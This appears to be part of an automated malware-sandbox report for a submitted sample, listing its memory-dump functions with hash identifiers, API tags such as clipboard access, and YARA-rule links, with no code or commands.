                                                                                                                                                                                                                                            • Opcode ID: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
                                                                                                                                                                                                                                            • Instruction ID: 55029b9e38fdfb0df3b4b8151af6569af59bc0d0f5a25f3444c4cc7de86b0466
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E001B1F1B0035257DB209F55B4C1B27B2A86F95718F08443EE80867342DB7DFC44C2AA
                                                                                                                                                                                                                                            Function 024B9C17 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: babb52ce3867e81688af6e2cbfc925ee92a6f3f8cd139ab93b6cbf9c46b7bedb
                                                                                                                                                                                                                                            • Instruction ID: dc553325a8e6631a22f4eb1b47f9b9307813544eab282f02fb030ddad6cf930c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: babb52ce3867e81688af6e2cbfc925ee92a6f3f8cd139ab93b6cbf9c46b7bedb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 180171F160030187EB22AE6585C1B77B6F96F82715F18452EDB0A57300DB76E815CEB5
                                                                                                                                                                                                                                            Function 024B55B3 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 08b4345849cd0f47e80d1ed5c22eab79d945ad8a979d27bd12cd0f1252f48fec
                                                                                                                                                                                                                                            • Instruction ID: 5e94d896eb3e17ad29e6d7673a861a027fb9c7f82995a6f2207671aa435dab1a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08b4345849cd0f47e80d1ed5c22eab79d945ad8a979d27bd12cd0f1252f48fec
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D11E2367543404BD718CF68D8E06BFB3E19B86301F99543E9482C3390CBB8C9068B46
                                                                                                                                                                                                                                            Function 024C6C3B Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 358e2d3b4c42a0c731e3efba7596486553403020c12b89a5f8a1758b9ddfefcd
                                                                                                                                                                                                                                            • Instruction ID: d3f395a3666704a597fe5cd152006ad51eb89866d7b0aff70ef20e2f81c0ad7d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 358e2d3b4c42a0c731e3efba7596486553403020c12b89a5f8a1758b9ddfefcd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50112B7D6042005BD3509F29DD80E3BB7EAEBD6700F36D43EE68057251DB30C8529756
                                                                                                                                                                                                                                            Function 0040E83B Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                            • Instruction ID: 78b4a12427cc173d586094b37f3e700b38d0ff2ce6b24877113fcbe6adf3e26f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D71127717507404FD3189F25CCD2A637772ABC6314705893DB8519BBD3C67CAC0587A8
                                                                                                                                                                                                                                            Function 0249EAA2 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                            • Instruction ID: 96776e6ca58e4aa10d5ba030708700e1f4611ba1bbc7aad69bbda72d62d4017c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD11E7747407804FD7158F28CCD5E627B63AB86318719853EA8429BB92C66CAC05CB64
                                                                                                                                                                                                                                            Function 0249C030 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                            • Instruction ID: 0e8f66d183fe9e14be1779e28ad330ba7fcea72684f28741df0ac43413b1dcca
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5611A071608341ABD724DF29DDA077FBBE2EBC6254F15AE2CE59653791C630C841CB0A
                                                                                                                                                                                                                                            Function 024B70E4 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                            • Instruction ID: 36e37f5184ae6b5f12f1d3ae35ca6bd396f784eb5bf305c7c25848572748988b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20F06DB5E0C3808BC718CF28C44066AFBE5AB9A700F10A93ED48AA3341DB31D545CB4A
                                                                                                                                                                                                                                            Function 024B7797 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
                                                                                                                                                                                                                                            • Instruction ID: dafb754127db889cc387327b81ff0c84183e6fb29f7d1198a0a26455a67b0274
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28F069B410D3919FC300DF29D29051BFFE0ABD5318F64EA5CE8DA5B212D334C5028B4A
                                                                                                                                                                                                                                            Function 0042526A Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                            • Instruction ID: 26823722f3a6afcc10447d79cbf8b06261be6e3c3bcefc34e32834821d37eed0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4F0EDB5A88301BAF6248A00DD43F67B6A89755B04F301519B344790E1E5E1F559870E
                                                                                                                                                                                                                                            Function 024B54D1 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                            • Instruction ID: bf3276d5db2ddd71b26ab661fc93688d98b36442342a27f76758d7edce35ef5b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52F0EDB5A88301BEF6249A01CC43F6BB6B49B55B04F30152DB344790E0F5E1B5498B0E
                                                                                                                                                                                                                                            Function 0043AAB2 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                            • Instruction ID: fe1efda9bcc16308283c5424634e62067ac2dc8fe4a9505e7820fcb65e305570
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1F0A735B456808BE704CF38D82155BBBE2E38B324F185A7DD681D3751D639C8018609
                                                                                                                                                                                                                                            Function 024CAD19 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                            • Instruction ID: e9e37191ca131b7bd35de4a38a45ac0981d22013e653bb1db83e87ad9d4c0b5e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7F0A739B456808BE704CF38E82195BBBE2E387228F145A7DD641D3751DB39C8018605
                                                                                                                                                                                                                                            Function 024B63B6 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                            • Instruction ID: 125372f5d3b68d82b85b5642a72c563733b032824caca2ff8a440a1607dfe248
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5D05E2590C67A824A2B4E1805501FEA72A4F03515B0B75E6DCE1BF682DBE6C9476278
                                                                                                                                                                                                                                            Function 024CC268 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                            • Instruction ID: 979b3066809f2b39c8d4e254b46c6f556eea9d2a5e27a8b6f776bea0b7d6dcb5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1AB002759486418FC644DF18D584974F7F5AB0B211F1564549589E7222D220D8408A19
                                                                                                                                                                                                                                            Function 024CC79B Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                            • Instruction ID: 10c72ce3a0ca8e08a8575cf423c81d1ec4165de9f21f41d416b206e48e332a4b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FDA00239E5C40197CA08CF20A854871E2BA6B5F204FA134288106B7C52D951D500854C
                                                                                                                                                                                                                                            Function 024B559D Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                            • Instruction ID: 70204a4f19da818e306c590333116dd845209fb171f96af6639338c1a50bb7b2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38B00254855145D6D704CF10D905575F270BF43705F10F655A40437160D3B4C248870E
                                                                                                                                                                                                                                            Function 004310D0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                            • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                            • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                            • Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                            • Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797
                                                                                                                                                                                                                                            Function 024C1337 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                            • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                            • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                            • Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                            • Instruction ID: 1209ac60c52be1ee3d2609d382f462b43dac307b6badfe25585f3bede4718c51
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61418E7050C7818FD341AF7C988836FBEE09F86314F084A7EE4DA86392D6788549C797
                                                                                                                                                                                                                                            Function 0042F83B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Variant$ClearInit
                                                                                                                                                                                                                                            • String ID: L
                                                                                                                                                                                                                                            • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                            • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                            • Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53
                                                                                                                                                                                                                                            Function 024BFAA2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Variant$ClearInit
                                                                                                                                                                                                                                            • String ID: L
                                                                                                                                                                                                                                            • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                            • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                            • Instruction ID: 3ad9b868c03ac49d6ff77bb70abfbb19bf88551a758c6b1064517cd83c371392
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF412B7110CBC18ED321DB38845869EBFD16FE6220F188A9DE5F5873E2D674854ACB53
                                                                                                                                                                                                                                            Function 004322BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MetricsSystem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                            • Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                            • Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86